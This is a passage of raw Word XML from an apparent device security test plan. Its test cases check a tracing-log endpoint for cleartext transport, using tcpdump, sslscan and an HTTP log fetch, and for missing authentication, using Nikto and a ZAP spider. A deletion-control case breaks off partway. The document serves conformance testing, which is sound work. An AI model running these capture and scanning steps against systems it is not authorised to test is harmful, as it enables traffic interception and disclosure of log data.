      <w:tr w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB4EAC3" w14:textId="6C9D1A34" w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F42088" w14:textId="77777777" w:rsidR="003C41F6" w:rsidRPr="006D5B99"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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003C41F6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Trigger a legitimate log read.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7890F864"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Passively capture the exchange.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C95FF40" w14:textId="77777777" w:rsidR="003C41F6"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Extract the cleartext log content.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A21B25" w14:textId="516E1BE1" w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirm no encrypted transport endpoint is available.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C0E68F" w14:textId="77777777" w:rsidR="003C41F6"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PASS against the requirement if log transport is encrypted. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F7E437" w14:textId="45A19895" w:rsidR="00F25477" w:rsidRPr="006D5B99"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D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected: cleartext recoverable and no encrypted transport </w:t>
            </w:r>
            <w:r w:rsidR="00CA0CF5" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> supporting confidentiality-in-transit observation. (Method aligned to the framework's TLS-analysis step, including certificate-chain capture, for consistency.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79A56CE5" w14:textId="77777777" w:rsidR="00F25477" w:rsidRPr="006D5B99" w:rsidRDefault="00F25477" w:rsidP="00F25477">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4F8107" w14:textId="77777777" w:rsidR="00F25477" w:rsidRPr="006D5B99" w:rsidRDefault="00F25477" w:rsidP="00F25477">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6D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DACA1F4" w14:textId="77777777" w:rsidR="00F25477" w:rsidRPr="006D5B99"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F25477" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D696B0" w14:textId="0D1A52C4" w:rsidR="00F25477" w:rsidRPr="006D5B99"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TC-RQ014-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35C38" w:rsidRPr="006D5B99"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35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="365CA859" w14:textId="4454FB98" w:rsidR="00F35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00806D34" w:rsidP="00F35C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NV1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35C38" w:rsidRPr="006D5B99"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35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5DBAF3" w14:textId="701C38DC" w:rsidR="00F35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">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tcpdump/Wireshark, sslscan (CM-005).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35C38" w:rsidRPr="006D5B99"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35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BE39B9" w14:textId="77777777"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6DB933F6" w14:textId="77777777"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sslscan --show-certificate $SRIO:80 | tee cm_rq014-02_sslscan.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750B68B0" w14:textId="77777777"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sudo tcpdump -i eth1 host $SRIO and port 80 -w cm_rq014-02_log.pcap &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51BC1FBF" w14:textId="0D2991E8"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-s http://$</w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391ACD4F" w14:textId="77777777"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kill %1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54433141" w14:textId="77777777" w:rsidR="00F35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">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Open cm_rq014-02_log.pcap in Wireshark &gt; Follow &gt; HTTP Stream to show</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DAAA89F" w14:textId="30C5777C" w:rsidR="00F35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C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 the plaintext log content.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35C38" w:rsidRPr="006D5B99"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6B2E59AC" w:rsidR="00F35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64EEB4C5" w14:textId="2285A6F7" w:rsidR="00F35C38" w:rsidRPr="006D5B99" w:rsidRDefault="00F35C38" w:rsidP="00F35C38">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log content is readable in plaintext, no transport encryption (defense-in-depth observation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D5FB03E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABCCF7D" w14:textId="77777777" w:rsidR="00F25477" w:rsidRPr="006D5B99" w:rsidRDefault="00F25477" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43838447" w14:textId="515A5D5F" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D14CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ014-03 - </w:t>
      </w:r>
      <w:r w:rsidR="003326BB" w:rsidRPr="002D14CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control Mechanism Probe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277680EB" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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15B2C0C4"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710F70E4" w14:textId="1FF0D786" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-014 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 1.1 / CR 1.2 / CR 2.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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1551BDCB" w14:textId="7598A07C" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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Information Disclosure (missing authorization gate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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0DB9FF3" w14:textId="3168C8CC" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99"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6320A442" w14:textId="08854D14" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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Enumerate the information interface for any authentication mechanism, role model, or purpose-gate governing the tracing-log endpoint, establishing that no gate exists by design.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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1F7EE098" w14:textId="5A3622A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tracing-log endpoint and adjacent endpoints for any authentication or authorization control.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617AF059" w14:textId="77777777" w:rsidR="00B7463F"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to identify any role/identity model.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A0CF26" w14:textId="44636AF6" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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any purpose-limitation mechanism is present.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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35AE4F21" w14:textId="698DBE03" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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authentication mechanism, role model, or purpose-gate is present </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the requirement cannot be met because the device has no identity model to restrict access to any party.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59BE162A" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6528F0"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6D5B99"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6241D3F9"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2E309BBE" w14:textId="1C768D08"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TC-RQ014-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3695A" w:rsidRPr="006D5B99"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B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44FC367E" w14:textId="2885276F" w:rsidR="00B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695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B3695A" w:rsidRPr="006D5B99"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B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DE7EE35" w14:textId="1AB57658" w:rsidR="00B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">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pl-PL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pl-PL"/>
              </w:rPr>
              <w:t>ZAP (CM-004), Nikto (CM-007), curl.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3695A" w:rsidRPr="006D5B99"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B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E89D5D3"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48DCE0E9"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nikto -h http://$SRIO -output cm_rq014-03_nikto.html -Format html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAD1BA4"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Search the output for any login/auth endpoints.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780A49FA"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p>
          <w:p w14:paraId="3DC4EF23"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zaproxy -daemon -host 127.0.0.1 -port 8090 -config api.disablekey=true &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4716DA2C" w14:textId="77777777" w:rsidR="00B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">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curl "http://127.0.0.1:8090/JSON/spider/action/scan/?url=http://$SRIO/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0CEB90" w14:textId="52BC9643" w:rsidR="00B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">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lang w:val="en-US"/>
              </w:rPr>
              <w:t># check ZAP's discovered URLs / responses for any 401/403 status codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3695A" w:rsidRPr="006D5B99"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015BF1C0" w:rsidR="00B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCFA937" w14:textId="765A89B0" w:rsidR="00B3695A" w:rsidRPr="006D5B99" w:rsidRDefault="00B3695A" w:rsidP="00B3695A">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 xml:space="preserve">Expected: no authentication/role mechanism found on any endpoint </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms G-1 (no identity model exists).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D705A3C" w14:textId="2C0C5E0F" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">TC-RQ014-04 - </w:t>
      </w:r>
      <w:r w:rsidR="001C76D6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Deletion-Control Probe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42A1E9" w14:textId="77777777" w:rsidR="00AA306B" w:rsidRPr="006D5B99" w:rsidRDefault="00AA306B" w:rsidP="00AA306B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446DD94D"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61E099F6" w14:textId="5EE32D3F"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D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-014 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D525F5C" w14:textId="214BA5EC" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E362ED" w14:textId="04EE28FE" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DDA1A4" w14:textId="4D597393" w:rsidR="00AA306B" w:rsidRPr="006D5B99"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Demonstrate that there is no controlled-deletion mechanism for the tracing log (only the uncontrolled cold-start wipe), so no data-lifecycle control exists to govern who may erase the record and when.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA306B" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00AA306B" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
